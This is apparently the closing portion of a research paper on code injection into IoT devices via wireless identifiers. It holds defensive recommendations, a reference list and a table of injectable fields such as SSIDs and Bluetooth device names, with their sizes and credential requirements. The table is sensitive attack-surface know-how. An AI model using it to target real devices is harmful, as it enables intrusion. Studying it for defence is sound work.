- Use vulnerability databases: Utilize vulnerability databases such as the NVD to stay informed about the latest known vulnerabilities in software, firmware, and operating systems used in IoT devices. Using these databases allows users and manufacturers to gain insight into potential vulnerabilities and take necessary precautionary steps before any damage occurs.
- Conduct security vulnerability assessments: Regularly perform security vulnerability assessments on IoT systems and devices. Criticality analysis using methods such as IMECA can be performed to identify, assess, and mitigate risks.
- Raise awareness and educate users: Educate users about the potential risks of code injection attacks and provide them with best practices for securing their IoT devices, such as using strong, unique passwords and keeping software up-to-date.
Author Contributions
Funding
Institutional Review Board Statement
Informed Consent Statement
Data Availability Statement
Acknowledgments
Conflicts of Interest
References
- Hassan, R.; Qamar, F.; Hasan, M.K.; Aman, A.H.; Ahmed, A.S. Internet of things and its applications: A comprehensive survey. Symmetry 2020, 12, 1674. [Google Scholar] [CrossRef]
- Majid, M.; Habib, S.; Javed, A.R.; Rizwan, M.; Srivastava, G.; Gadekallu, T.R.; Lin, J.C.-W. Applications of wireless sensor networks and internet of things frameworks in the industry revolution 4.0: A systematic literature review. Sensors 2022, 22, 2087. [Google Scholar] [CrossRef] [PubMed]
- Ménard, A. How Can We Recognize the Real Power of the Internet of Things? Available online: https://www.mckinsey.com/capabilities/mckinsey-digital/our-insights/how-can-we-recognize-the-real-power-of-the-internet-of-things (accessed on 10 June 2023).
- Pau, G.; Chaudet, C.; Zhao, D.; Collotta, M. Next Generation Wireless Technologies for Internet of Things. Sensors 2018, 18, 221. [Google Scholar] [CrossRef] [Green Version]
- Mollah, M.B.; Zeadally, S.; Azad, M.A. Emerging wireless technologies for internet of things applications: Opportunities and challenges. In Encyclopedia of Wireless Networks; Springer: Cham, Switzerland, 2020; pp. 390–400. [Google Scholar]
- IEEE 802.11ah-2016; IEEE Standard for Information Technology—Telecommunications and Information Exchange between Systems—Local and Metropolitan Area Networks—Specific Requirements—Part 11: Wireless LAN Medium Access Control (MAC) and Physical Layer (PHY) Specifications Amendment 2: Sub 1 ghz License Exempt Operation. IEEE Standards Association: Piscataway, NJ, USA, 2017; pp. 1–594.
- Bluetooth Core Specification Version: 5.4. 2023. Available online: https://www.bluetooth.com/specifications/specs/core-specification-5-4/ (accessed on 22 June 2023).
- Zigbee Specification Revision 22 1.0. 2017. Available online: https://csa-iot.org/wp-content/uploads/2022/01/docs-05-3474-22-0csg-zigbee-specification-1.pdf (accessed on 22 June 2023).
- Thread Specification 1.3.0. 2023. Available online: https://www.threadgroup.org/support#specifications (accessed on 22 June 2023).
- LoRaWAN™ 1.1 Specification. 2017. Available online: https://lora-alliance.org/resource_hub/lorawan-specification-v1-1/ (accessed on 22 June 2023).
- Release 13 Specifications. 2016. Available online: https://www.3gpp.org/specifications-technologies/releases/release-13 (accessed on 22 June 2023).
- Dargaoui, S.; Azrour, M.; El Allaoui, A.; Amounas, F.; Guezzaz, A.; Attou, H.; Hazman, C.; Benkirane, S.; Bouazza, S.H. An overview of the security challenges in IOT environment. In Advanced Technology for Smart Environment and Energy; Springer: Cham, Switzerland, 2023; pp. 151–160. [Google Scholar]
- Neshenko, N.; Bou-Harb, E.; Crichigno, J.; Kaddoum, G.; Ghani, N. Demystifying IOT security: An exhaustive survey on IOT vulnerabilities and a first empirical look on internet-scale IOT exploitations. IEEE Commun. Surv. Tutor. 2019, 21, 2702–2733. [Google Scholar] [CrossRef]
- Siwakoti, Y.R.; Bhurtel, M.; Rawat, D.B.; Oest, A.; Johnson, R. Advances in IOT security: Vulnerabilities, enabled Criminal Services, attacks and countermeasures. IEEE Internet Things J. 2023, 10, 11224–11239. [Google Scholar] [CrossRef]
- McDermott, C.D.; Majdani, F.; Petrovski, A.V. Botnet detection in the internet of things using Deep learning approaches. In Proceedings of the 2018 International Joint Conference on Neural Networks (IJCNN), Rio de Janeiro, RJ, Brazil, 8–13 July 2018. [Google Scholar]
- Ande, R.; Adebisi, B.; Hammoudeh, M.; Saleem, J. Internet of things: Evolution and technologies from a security perspective. Sustain. Cities Soc. 2020, 54, 101728. [Google Scholar] [CrossRef]
- Baranchuk, A.; Refaat, M.M.; Patton, K.K.; Chung, M.K.; Krishnan, K.; Kutyifa, V.; Upadhyay, G.; Fisher, J.D.; Lakkireddy, D.R. Cybersecurity for cardiac implantable electronic devices: What should you know? J. Am. Coll. Cardiol. 2018, 71, 1284–1288. [Google Scholar] [CrossRef]
- Patel, A.B.; Sharma, P.R.; Randhawa, P. Internet of things (IOT) system security vulnerabilities and its mitigation. In Security and Privacy in Cyberspace; Blockchain Technologies; Springer: Singapore, 2022; pp. 137–156. [Google Scholar]
- Shah, Y.; Sengupta, S. A survey on classification of cyber-attacks on IOT and IIOT devices. In Proceedings of the 11th IEEE Annual Ubiquitous Computing, Electronics & Mobile Communication Conference (UEMCON), New York, NY, USA, 28–31 October 2020. [Google Scholar]
- Karale, A. The challenges of IOT addressing security, ethics, privacy, and laws. Internet Things 2021, 15, 100420. [Google Scholar] [CrossRef]
- Gaber, T.; El-Ghamry, A.; Hassanien, A.E. Injection attack detection using machine learning for smart IOT Applications. Phys. Commun. 2022, 52, 101685. [Google Scholar] [CrossRef]
- Ray, D.; Ligatti, J. Defining code-injection attacks. ACM SIGPLAN Not. 2012, 47, 179–190. [Google Scholar] [CrossRef] [Green Version]
- Mitropoulos, D.; Spinellis, D. Fatal injection: A survey of modern code injection attack countermeasures. Peer J. Comput. Sci. 2017, 3, e136. [Google Scholar] [CrossRef] [Green Version]
- Hu, J.; Zhao, W.; Cui, Y. A survey on SQL injection attacks, detection and prevention. In Proceedings of the 12th International Conference on Machine Learning and Computing, Shenzhen, China, 15–17 February 2020. [Google Scholar]
- Nithya, V.; Pandian, S.L.; Malarvizhi, C. A survey on detection and prevention of cross-site scripting attack. Int. J. Secur. Its Appl. 2015, 9, 139–152. [Google Scholar] [CrossRef]
- Stasinopoulos, A.; Ntantogian, C.; Xenakis, C. Commix: Automating Evaluation and exploitation of command injection vulnerabilities in web applications. Int. J. Inf. Secur. 2018, 18, 49–72. [Google Scholar] [CrossRef] [Green Version]
- Xiao, X.; Yan, R.; Ye, R.; Li, Q.; Peng, S.; Jiang, Y. Detection and prevention of code injection attacks on HTML5-based apps. In Proceedings of the Third International Conference on Advanced Cloud and Big Data, Yangzhou, China, 30 October–1 November 2015. [Google Scholar]
- OWASP Top 10 Web Application Security Risks. 2021. Available online: https://owasp.org/www-project-top-ten (accessed on 10 June 2023).
- IEEE 802.11-2020; IEEE Standard for Information Technology—Telecommunications and Information Exchange between Systems—Local and Metropolitan Area Networks—Specific Requirements—Part 11: Wireless LAN Medium Access Control (MAC) and Physical Layer (PHY) Specifications. IEEE Standards Association: Piscataway, NJ, USA, 2021; pp. 1–4379.
- Raspberry Pi 4 Model B. Available online: https://www.raspberrypi.com/products/raspberry-pi-4-model-b/ (accessed on 10 June 2023).
- Abakumov, A.; Kharchenko, V. Combining IMECA analysis and penetration testing to assess the Cybersecurity of Industrial Robotic Systems. In Proceedings of the 12th International Conference on Dependable Systems, Services and Technologies (DESSERT), Athens, Greece, 9–11 December 2022. [Google Scholar]
- Security Encyclopedia. What is the Morris Worm? 5 Things to Know. Available online: https://www.hypr.com/security-encyclopedia/morris-worm (accessed on 10 June 2023).
- Bryce, C.; Vitek, J. The JavaSeal Mobile Agent Kernel. Auton. Agents Multi Agent Syst. 2001, 4, 359–384. [Google Scholar] [CrossRef]
- Francillon, A.; Castelluccia, C. Code injection attacks on Harvard-architecture devices. In Proceedings of the 15th ACM Conference on Computer and Communications Security, Alexandria, VA, USA, 27–31 October 2008. [Google Scholar]
- Paul, B. Internet of things (IOT), three-layer architecture, security issues and counter measures. In ICT Analysis and Applications; Springer: Singapore, 2022; pp. 23–34. [Google Scholar]
- Brown, E. Linux Still Rules IoT, Says Survey, with Raspbian Leading the Way. 2018. Available online: https://linuxgizmos.com/linux-still-rules-iot-says-survey-with-raspbian-leading-the-way (accessed on 10 June 2023).
- Raspberry Pi OS. Available online: https://www.raspberrypi.com/software (accessed on 10 June 2023).
- Microsoft Windows OS. Available online: https://www.microsoft.com/en-us/windows (accessed on 10 June 2023).
- Ubuntu Core. Available online: https://ubuntu.com/core (accessed on 10 June 2023).
- OpenWrt Project. Available online: https://openwrt.org/ (accessed on 10 June 2023).
- Yocto Project. Available online: https://www.yoctoproject.org/ (accessed on 10 June 2023).
- Microsoft Windows IoT. Available online: https://developer.microsoft.com/en-us/windows/iot (accessed on 10 June 2023).
- 0xffsec Handbook. File Inclusion and Path Traversal. 2022. Available online: https://0xffsec.com/handbook/web-applications/file-inclusion-and-path-traversal (accessed on 10 June 2023).
- El Aassal, A.; Baki, S.; Das, A.; Verma, R.M. An in-depth benchmarking and evaluation of Phishing Detection Research for Security needs. IEEE Access 2020, 8, 22170–22192. [Google Scholar] [CrossRef]
- Nagendran, K.; Balaji, S.; Raj, B.A.; Chanthrika, P.; Amirthaa, R.G. Web application firewall evasion techniques. In Proceedings of the 6th International Conference on Advanced Computing and Communication Systems (ICACCS), Coimbatore, India, 6–7 March 2020. [Google Scholar]
- Cho, S.; Kim, G.; Cho, S.; Choi, J.; Park, M.; Han, S. Runtime input validation for java web applications using static bytecode instrumentation. In Proceedings of the International Conference on Research in Adaptive and Convergent Systems, Odense, Denmark, 11–14 October 2016. [Google Scholar]
- Awad Almutairi, A.; Mishra, S.; AlShehri, M. Web security: Emerging threats and defense. Comput. Syst. Sci. Eng. 2022, 40, 1233–1248. [Google Scholar] [CrossRef]
- Hubczyk, M.; Domanski, A.; Domanska, J. Local and remote file inclusion. Internet Tech. Dev. Appl. 2012, 2, 189–200. [Google Scholar]
- Kalantari, F.; Zaeifi, M.; Bao, T.; Wang, R.; Shoshitaishvili, Y.; Doupé, A. Context-auditor: Context-sensitive content injection mitigation. In Proceedings of the 25th International Symposium on Research in Attacks, Intrusions and Defenses, Limassol, Cyprus, 26–28 October 2022. [Google Scholar]
- Hoffman, D.; Wang, H.-Y.; Chang, M.; Ly-Gagnon, D. Grammar based testing of HTML injection vulnerabilities in RSS feeds. In Proceedings of the Testing: Academic and Industrial Conference—Practice and Research Techniques, Windsor, UK, 4–6 September 2009. [Google Scholar]
- Sharif, M.H.U. Web Attacks Analysis and Mitigation Techniques. Int. J. Eng. Res. Technol. 2022, 10–12. [Google Scholar]
- Heiderich, M.; Frosch, T.; Jensen, M.; Holz, T. Crouching tiger—hidden payload. In Proceedings of the 18th ACM Conference on Computer and Communications Security, Chicago, IL, USA, 17–21 October 2011. [Google Scholar]
- Huang, L.-S.; Weinberg, Z.; Evans, C.; Jackson, C. Protecting browsers from cross-origin CSS attacks. In Proceedings of the 17th ACM Conference on Computer and Communications Security, Chicago, IL, USA, 4–8 October 2010. [Google Scholar]
- Gupta, S.; Gupta, B.B. JS-san: Defense Mechanism for HTML5-based web applications against javascript code injection vulnerabilities. Secur. Commun. Netw. 2016, 9, 1477–1495. [Google Scholar] [CrossRef] [Green Version]
- Jan, S.; Panichella, A.; Arcuri, A.; Briand, L. Automatic Generation of Tests to Exploit XML Injection Vulnerabilities in Web Applications. IEEE Trans. Softw. Eng. 2017, 45, 335–362. [Google Scholar] [CrossRef] [Green Version]
- Gupta, C.; Singh, R.K.; Mohapatra, A.K. A survey and classification of XML based attacks on web applications. Inf. Secur. J. A Glob. Perspect. 2020, 29, 183–198. [Google Scholar] [CrossRef]
- Demir, B.; Gacovski, Z.; Pivovarov, V.; Goracinova, L. System for Detection of Network Threats based on Classifiers. TEM J. 2014, 3, 120–126. [Google Scholar]
- Clarke, J. SQL Injection Attacks and Defense; Elsevier: Amsterdam, The Netherlands, 2012. [Google Scholar]
- Hlaing, Z.C.; Khaing, M. A detection and prevention technique on SQL injection attacks. In Proceedings of the IEEE Conference on Computer Applications (ICCA), Yangon, Myanmar, 27–28 February 2020. [Google Scholar]
- Nasereddin, M.; ALKhamaiseh, A.; Qasaimeh, M.; Al-Qassas, R. A Systematic Review of Detection and Prevention Techniques of SQL Injection Attacks. Inf. Secur. J. A Glob. Perspect. 2021, 32, 252–265. [Google Scholar] [CrossRef]
- Rousseau, A. Hijacking.net to defend powershell. arXiv 2017, arXiv:1709.07508. [Google Scholar]
- Su, Z.; Wassermann, G. The Essence of Command Injection Attacks in Web Applications. ACM SIGPLAN Not. 2006, 41, 372–382. [Google Scholar] [CrossRef]
- Wright, C.S. Taking control, functions to DLL injection. SSRN Electron. J. 2007. [Google Scholar] [CrossRef]
- Uitto, J.; Rauti, S.; Mäkelä, J.-M.; Leppänen, V. Preventing malicious attacks by diversifying Linux shell commands. In Proceedings of the 14th Symposium on Programming Languages and Software Tools (SPLST), Tampere, Finland, 9–10 October 2015. [Google Scholar]
- O’Leary, M. Privilege Escalation in Linux. In Cyber Operations: Building, Defending, and Attacking Modern Computer Networks; Apress: Berkeley, CA, USA, 2019; pp. 419–453. [Google Scholar]
- Kawakoya, Y.; Iwamura, M.; Itoh, M. Memory behavior-based automatic malware unpacking in Stealth debugging environment. In Proceedings of the 5th International Conference on Malicious and Unwanted Software, Nancy, France, 19–20 October 2010. [Google Scholar]
- Shahriar, H.; Haddad, H.M.; Bulusu, P. OCL Fault Injection-based detection of LDAP query injection vulnerabilities. In Proceedings of the IEEE 40th Annual Computer Software and Applications Conference (COMPSAC), Atlanta, GA, USA, 10–14 June 2016. [Google Scholar]
- Hiesgen, R.; Nawrocki, M.; Schmidt, T.C.; Wählisch, M. The race to the vulnerable: Measuring the log4j shell incident. arXiv 2022, arXiv:2205.02544. [Google Scholar]
- Feng, S.; Lubis, M. Defense-in-depth security strategy in LOG4J vulnerability analysis. In Proceedings of the International Conference Advancement in Data Science, E-learning and Information Systems (ICADEIS), Bandung, Indonesia, 23–24 November 2022. [Google Scholar]
- Rodríguez, G.E.; Torres, J.G.; Flores, P.; Benavides, D.E. Cross-site scripting (XSS) attacks and mitigation: A survey. Comput. Netw. 2020, 166, 106960. [Google Scholar] [CrossRef]
- Kaur, J.; Garg, U.; Bathla, G. Detection of cross-site scripting (XSS) attacks using Machine Learning Techniques: A Review. Artif. Intell. Rev. 2023, 1–45. [Google Scholar] [CrossRef]
- Zhong, W. Command Injection. Available online: https://owasp.org/www-community/attacks/Command_Injection (accessed on 10 June 2023).
- Calzavara, S.; Conti, M.; Focardi, R.; Rabitti, A.; Tolomei, G. Machine learning for web vulnerability detection: The case of cross-site request forgery. IEEE Secur. Priv. 2020, 18, 8–16. [Google Scholar] [CrossRef]
- Sinha, A.K.; Tripathy, S. cookieArmor: Safeguarding against cross-site request forgery and session hijacking. Secur. Priv. 2019, 2, e60. [Google Scholar] [CrossRef] [Green Version]
- Das Noyon, A.; Md Abid, Y.; Maruf Hassan, M.; Hasan Sharif, M.; Nawar Deepa, F.; Islam Rumel, R.; Haque, R.; Nasrin, S.; Zaman, M. A study of Ajax template injection in web applications. Int. J. Eng. Technol. 2018, 7, 123–127. [Google Scholar] [CrossRef] [Green Version]
- Abdellatif, A.; Costa, D.; Badran, K.; Abdalkareem, R.; Shihab, E. Challenges in chatbot development: A study of stack overflow posts. In Proceedings of the 17th International Conference on Mining Software Repositories, Seoul, Republic of Korea, 29–30 June 2020. [Google Scholar]
- Huang, N.; Huang, S.; Chang, C. Analysis to heap overflow exploit in Linux with symbolic execution. Proc. IOP Conf. Ser. Earth Environ. Sci. 2019, 252, 042100. [Google Scholar] [CrossRef]
- Lai, E.; Luo, W. Static analysis of integer overflow of smart contracts in Ethereum. In Proceedings of the 4th International Conference on Cryptography, Security and Privacy, Nanjing, China, 10–12 January 2020. [Google Scholar]
- Amatov, B.; Lehniger, K.; Langendorfer, P. Return-oriented programming gadget catalog for the XTENSA Architecture. In Proceedings of the IEEE International Conference on Pervasive Computing and Communications Workshops and other Affiliated Events (PerCom Workshops), Pisa, Italy, 21–25 March 2022. [Google Scholar]
- Lehniger, K.; Langendorfer, P. Through the window: On the exploitability of XTENSA’s register window overflow. In Proceedings of the 32nd International Telecommunication Networks and Applications Conference (ITNAC), Wellington, New Zealand, 30 November–2 December 2022. [Google Scholar]
- Yao, F.; Chen, J.; Venkataramani, G. Jop-alarm: Detecting jump-oriented programming-based anomalies in applications. In Proceedings of the IEEE 31st International Conference on Computer Design (ICCD), Asheville, NC, USA, 6–9 October 2013. [Google Scholar]
- Nicula, Ș.; Zota, R.D. Exploiting stack-based buffer overflow using modern day techniques. Procedia Comput. Sci. 2019, 160, 9–14. [Google Scholar] [CrossRef]
- Shafana, N.J.; Pawar, K. Exploitation analysis of buffer overflow in SL-Mail Server. In Proceedings of the Fifth International Conference on I-SMAC (IoT in Social, Mobile, Analytics and Cloud) (I-SMAC), Palladam, India, 11–13 November 2021. [Google Scholar]
- Kilic, F.; Kittel, T.; Eckert, C. Blind format string attacks. Lecture Notes of the Institute for Computer Sciences, Social Informatics and Telecommunications Engineering; Springer: Cham, Switzerland, 2015; Volume 153, pp. 301–314. [Google Scholar]
- Han, W.; Ren, M.; Tian, S.; Ding, L.; He, Y. Static analysis of format string vulnerabilities. In Proceedings of the First ACIS International Symposium on Software and Network Engineering, Seoul, Republic of Korea, 19–20 December 2011. [Google Scholar]
- Singh, A.; Singh, B.; Joseph, H.; Singh, A. Vulnerability Analysis for Mail Protocols. In Vulnerability Analysis and Defense for the Internet: Advances in Information Security; Springer US: Boston, MA, USA, 2008; Volume 37, pp. 47–70. [Google Scholar]
- Shahriar, H.; Haddad, H. Object injection vulnerability discovery based on latent semantic indexing. In Proceedings of the 31st Annual ACM Symposium on Applied Computing, Pisa, Italy, 4–8 April 2016. [Google Scholar]
- Park, S.; Kim, D.; Jana, S.; Son, S. ${FUGIO}: Automatic Exploit Generation for {PHP}$ Object Injection Vulnerabilities. In Proceedings of the 31st USENIX Security Symposium (USENIX Security 22), Boston, MA, USA, 10–12 August 2022. [Google Scholar]
- Koutroumpouchos, N.; Lavdanis, G.; Veroni, E.; Ntantogian, C.; Xenakis, C. ObjectMap: Detecting insecure object deserialization. In Proceedings of the 23rd Pan-Hellenic Conference on Informatics, Nicosia, Cyprus, 28–30 November 2019. [Google Scholar]
- Li, S.; Kang, M.; Hou, J.; Cao, Y. Detecting node.js prototype pollution vulnerabilities via object lookup analysis. In Proceedings of the 29th ACM Joint Meeting on European Software Engineering Conference and Symposium on the Foundations of Software Engineering, Athens, Greece, 23–28 August 2021. [Google Scholar]
- Cui, A.; Costello, M.; Stolfo, S. When firmware modifications attack: A case study of embedded exploitation. In Proceedings of the 20th Annual Network & Distributed System Security Symposium, San Diego, CA, USA, 24–27 February 2013. [Google Scholar]
- Guillen, M.O.; Schmidt, D.; Sigl, G. Practical evaluation of code injection in encrypted firmware updates. In Proceedings of the 2016 Design, Automation & Test in Europe Conference & Exhibition (DATE), Dresden, Germany, 14–18 March 2016. [Google Scholar]
- Heiding, F.; Süren, E.; Olegård, J.; Lagerström, R. Penetration testing of connected households. Comput. Secur. 2023, 126, 103067. [Google Scholar] [CrossRef]
- Gupta, A. The IOT Hacker’s Handbook: A Practical Guide to Hacking the Internet of Things, 1st ed.; Apress: Berkeley, CA, USA, 2019; pp. 1–320. [Google Scholar]
- Pan, Z.; Chen, Y.; Chen, Y.; Shen, Y.; Li, Y. Loginjector: Detecting web application log injection vulnerabilities. Appl. Sci. 2022, 12, 7681. [Google Scholar] [CrossRef]
- Shah, J. RCE via LFI Log Poisoning—The Death Potion. 2020. Available online: https://shahjerry33.medium.com/rce-via-lfi-log-poisoning-the-death-potion-c0831cebc16d (accessed on 10 June 2023).
- Singavane, H. Converting LFI to RCE via Log Poisoning. 2021. Available online: https://himanshugurjar-10413.medium.com/rce-via-lfi-log-poisoning-3a33632caf4a (accessed on 10 June 2023).
- Chandel, R. SMTP Log Poisoning through LFI to Remote Code Execution. 2019. Available online: https://www.hackingarticles.in/smtp-log-poisioning-through-lfi-to-remote-code-exceution/ (accessed on 10 June 2023).
- Goyal, S. MySQL Log Poisoning through LFI Vulnerability. 2020. Available online: https://secnhack.in/mysql-log-poisoning-through-lfi-vulnerability (accessed on 10 June 2023).
- Kalpblogger. Hibernate Query Language (HQL) Injection. 2021. Available online: https://www.varutra.com/hibernate-query-language-hql-injection (accessed on 10 June 2023).
- Swisskyrepo. Hibernate Query Language Injection. 2022. Available online: https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20Injection/HQL%20Injection.md (accessed on 10 June 2023).
- Greshake, K.; Abdelnabi, S.; Mishra, S.; Endres, C.; Holz, T.; Fritz, M. More than you’ve asked for: A Comprehensive Analysis of Novel Prompt Injection Threats to Application-Integrated Large Language Models. arXiv 2023, arXiv:2302.12173. [Google Scholar]
- Perez, F.; Ribeiro, I. Ignore Previous Prompt: Attack Techniques For Language Models. arXiv 2022, arXiv:2211.09527. [Google Scholar]
- OpenAI. ChatGPT. Available online: https://openai.com/blog/chatgpt/ (accessed on 10 June 2023).
- Alobaidy, H.A.; Jit Singh, M.; Behjati, M.; Nordin, R.; Abdullah, N.F. Wireless transmissions, propagation and channel modelling for IOT Technologies: Applications and challenges. IEEE Access 2022, 10, 24095–24131. [Google Scholar] [CrossRef]
- Saavedra, E.; Mascaraque, L.; Calderon, G.; del Campo, G.; Santamaria, A. A universal testbed for IOT wireless technologies: Abstracting latency, error rate and stability from the IOT protocol and hardware platform. Sensors 2022, 22, 4159. [Google Scholar] [CrossRef]
- Chettri, L.; Bera, R. A comprehensive survey on internet of things (IOT) toward 5G Wireless Systems. IEEE Internet Things J. 2020, 7, 16–32. [Google Scholar] [CrossRef]
- Gast, M.S. 802.11 Wireless Networks: The Definitive Guide, 2nd ed.; O’Reilly Media: Sebastopol, CA, USA, 2017. [Google Scholar]
- Beard, C.; Stallings, W. Wireless Communication Networks and Systems, 1st ed.; Pearson: London, United Kingdom, 2015. [Google Scholar]
- TinyURL. Available online: https://tinyurl.com (accessed on 10 June 2023).
- Bitly. Available online: https://Bitly.com (accessed on 10 June 2023).
- Mohammadbagher, D. Transferring Backdoor Payloads with BSSID by Wireless Traffic. 2017. Available online: https://www.linkedin.com/pulse/transferring-backdoor-payloads-bssid-wireless-traffic-mohammadbagher/ (accessed on 10 June 2023).
- Heiland, D. Practical Exploitation Using a Malicious Service Set Identifier (SSID). Available online: https://media.blackhat.com/eu-13/briefings/Heiland/bh-eu-13-practical-exploitation-heiland-slides.pdf (accessed on 10 June 2023).
- Bluetooth Core Specification Version: 4.0. 2010. Available online: https://www.bluetooth.com/specifications/specs/core-specification-4-0/ (accessed on 22 June 2023).
- IEEE 802.15.4-2020; IEEE Standard for Low-Rate Wireless Networks. IEEE Standards Association: Piscataway, NJ, USA, 2020; pp. 1–800.
- ITU-T Y.4480; Low Power Protocol for Wide Area Wireless Networks. 2021. Available online: https://handle.itu.int/11.1002/1000/14818-en?locatt=format:pdf&auth (accessed on 22 June 2023).
- Z-Wave Specifications. 2023. Available online: https://z-wavealliance.org/development-resources-overview/specification-for-developers/ (accessed on 22 June 2023).
- ITU-T G.9959; Short Range Narrow-Band Digital Radiocommunication Transceivers—PHY, MAC, SAR and LLC Layer Specifications. 2015. Available online: https://www.itu.int/rec/T-REC-G.9959-201501-I/en (accessed on 22 June 2023).
- ZM3102N Z-Wave Module Datasheet. 2007. Available online: https://media.digikey.com/pdf/data%20sheets/zensys%20pdfs/zm3102n.pdf (accessed on 22 June 2023).
- ISO/IEC/IEEE 8802-15-6:2017; Information Technology—Telecommunications and Information Exchange between Systems—Local and Metropolitan Area Networks—Specific Requirements—Part 15-6: Wireless Body Area Network. International Organization for Standardization: Geneva, Switzerland, 2018; pp. 1–274.
- IEEE 802.15.7-2011; IEEE Standard for Local and Metropolitan Area Networks—Part 15.7: Short-Range Optical Wireless Communications. IEEE Standards Association: Piscataway, NJ, USA, 2019; pp. 1–407.
- IEC 62591; Industrial Networks—Wireless Communication Network and Communication Profiles—WirelessHART. 2016. Available online: https://webstore.iec.ch/publication/24433 (accessed on 22 June 2023).
- ISO/IEC 14443; Cards and Security Devices for Personal Identification—Contactless Proximity Objects. International Organization for Standardization: Geneva, Switzerland, 2018.
- ISO/IEC 15693; Identification Cards—Contactless Integrated Circuit Cards—Vicinity Cards. International Organization for Standardization: Geneva, Switzerland, 2018.
- ISO/IEC 18000; Information Technology—Radio Frequency Identification for Item Management. International Organization for Standardization: Geneva, Switzerland, 2021.
- Rieback, M.R.; Crispo, B.; Tanenbaum, A.S. RFID malware: Truth vs. myth. IEEE Secur. Priv. 2006, 4, 70–72. [Google Scholar] [CrossRef]
- ISO/IEC 18092:2013; Information Technology—Telecommunications and Information Exchange between Systems—Near Field Communication—Interface and Protocol (NFCIP-1). International Organization for Standardization: Geneva, Switzerland, 2013.
- ISO/IEC/IEEE 8802-2-1998; Information Technology—Telecommunications and Information Exchange Between Systems—Local and Metropolitan Area Networks—Specific Requirements—Part 2: Logical Link Control. International Organization for Standardization: Geneva, Switzerland, 1998; pp. 1–255.
- JIS X 6319-4; Specification of Implementation for Integrated Circuit(s) Cards—Part 4: High Speed Proximity Cards. Japanese Industrial Standard: Tokyo, Japan, 2016.
- NFC Forum. Available online: https://nfc-forum.org/build/specifications (accessed on 10 June 2023).
- Mulliner, C. Vulnerability Analysis and attacks on NFC-enabled mobile phones. In Proceedings of the 2009 International Conference on Availability, Reliability and Security, Fukuoka, Japan, 16–19 March 2009. [Google Scholar]
- Verdult, R.; Kooman, F. Practical attacks on NFC enabled cell phones. In Proceedings of the 2011 Third International Workshop on Near Field Communication 2011, Hagenberg, Austria, 22 February 2011. [Google Scholar]
- Sigfox Connected Objects: Radio Specifications v1.7. 2023. Available online: https://build.sigfox.com/sigfox-device-radio-specifications (accessed on 22 June 2023).
- Van der Wateren, F. The Art of Developing WSN Applications with MyriaNed; Technical Report for Chess Company: Haarlem, The Netherlands, 2008. [Google Scholar]
- Alliance. Weightless Specifications. Available online: https://www.weightless-alliance.org/technology (accessed on 10 June 2023).
- Ingenu. RPMA Specifications. Available online: https://www.ingenu.com/technology (accessed on 10 June 2023).
- WHDI. WHDI Specification. Available online: http://www.whdi.org/About (accessed on 10 June 2023).
- Release 17 Specifications. 2022. Available online: https://www.3gpp.org/specifications-technologies/releases/release-17 (accessed on 22 June 2023).
- DASH7 Alliance Protocol Specification v1.2. 2018. Available online: https://www.dash7-alliance.org/product/dash7-alliance-protocol-specification-v1-2/ (accessed on 22 June 2023).
- ETSI EN 300 175-1 V2.8.1. 2019. Available online: https://www.etsi.org/deliver/etsi_en/300100_300199/30017501/02.08.01_60/en_30017501v020801p.pdf (accessed on 22 June 2023).
- Aircrack-ng. Aircrack-ng. Available online: https://www.aircrack-ng.org/doku.php?id=Main (accessed on 10 June 2023).
- Kali. Kali Linux. Available online: https://www.kali.org (accessed on 10 June 2023).
- The Browser Exploitation Framework. BeEF. Available online: https://beefproject.com (accessed on 10 June 2023).
- ReFirmLabs. Binwalk. Available online: https://github.com/ReFirmLabs/binwalk (accessed on 10 June 2023).
- The GNU Netcat Project. Netcat. Available online: https://netcat.sourceforge.net (accessed on 10 June 2023).
- PortSwigger. Burp Suite. Available online: https://portswigger.net/burp (accessed on 10 June 2023).
- Internet Engineering Task Force. Telnet Protocol Specification: RFC 854. Available online: https://datatracker.ietf.org/doc/html/rfc3600 (accessed on 10 June 2023).
- Mosenia, A.; Jha, N.K. A comprehensive study of security of internet-of-things. IEEE Trans. Emerg. Top. Comput. 2017, 5, 586–602. [Google Scholar] [CrossRef]
- Urquhart, L.; McAuley, D. Avoiding the internet of insecure industrial things. Comput. Law Secur. Rev. 2018, 34, 450–466. [Google Scholar] [CrossRef]
- Apruzzese, G.; Pierazzi, F.; Colajanni, M.; Marchetti, M. Detection and threat prioritization of pivoting attacks in large networks. IEEE Trans. Emerg. Top. Comput. 2020, 8, 404–415. [Google Scholar] [CrossRef] [Green Version]
- Kanakogi, K.; Washizaki, H.; Fukazawa, Y.; Ogata, S.; Okubo, T.; Kato, T.; Kanuka, H.; Hazeyama, A.; Yoshioka, N. Tracing CVE vulnerability information to CAPEC attack patterns using natural language processing techniques. Information 2021, 12, 298. [Google Scholar] [CrossRef]
- National Vulnerability Database. Available online: https://nvd.nist.gov/ (accessed on 10 June 2023).
- Kalbo, N.; Mirsky, Y.; Shabtai, A.; Elovici, Y. The security of IP-based video surveillance systems. Sensors 2020, 20, 4806. [Google Scholar] [CrossRef]
Wireless Technology | Standard | Injectable Field | Injectable Field Format | Maximum Field Size | OSI-Reference Layer | Vulnerability Level |
---|---|---|---|---|---|---|
Wi-Fi | IEEE 802.11 | SSID | Character String (UTF-8) | 32 Octets | Data Link | Without network credentials |
BSSID | Hexadecimal Number | 6 Octets | ||||
Bluetooth | Bluetooth Core specifications | Device Name | Character String (UTF-8) | 248 Octets | Data Link | Without network credentials |
Low-Rate Wireless Networks (IEEE802.15.4) | IEEE 802.15.4 | PAN ID | Hexadecimal Number | 2 Octets | Data Link | Without network credentials |
Zigbee | IEEE 802.15.4 | PAN ID | Hexadecimal Number | 2 Octets | Data Link | Without network credentials |
Zigbee Specifications | EPID | 8 Octets | Network | |||
UserDescriptor | Character String (ASCII) | 16 Octets | Application | With network credentials | ||
Thread | IEEE 802.15.4 | PAN ID | Hexadecimal Number | 2 Octets | Data Link | Without network credentials |
Thread Specifications | XPANID | 8 Octets | Network | |||
Network Name | Character String (UTF-8) | 16 Octets | ||||
LoRaWAN | ITU-T Y.4480 | DevEUI | Hexadecimal Number | 2 Octets | Data Link | Without network credentials |
JoinEUI | 8 Octets | |||||
home_NetID | 16 Octets | |||||
Z-Wave | ITU-T G.9959 | HomeID | Hexadecimal Number | 4 Octets | Data Link | Without network credentials |
WirelessHART | IEC 62591 | Gateway HART Tag | Character String (Any in ISO Latin-1) | 32 Octets | Application | Without network credentials |
Wireless Body Area Networks | IEEE 802.15.6 | BAN ID | Hexadecimal Number | 1 Octet | Data Link | Without network credentials |
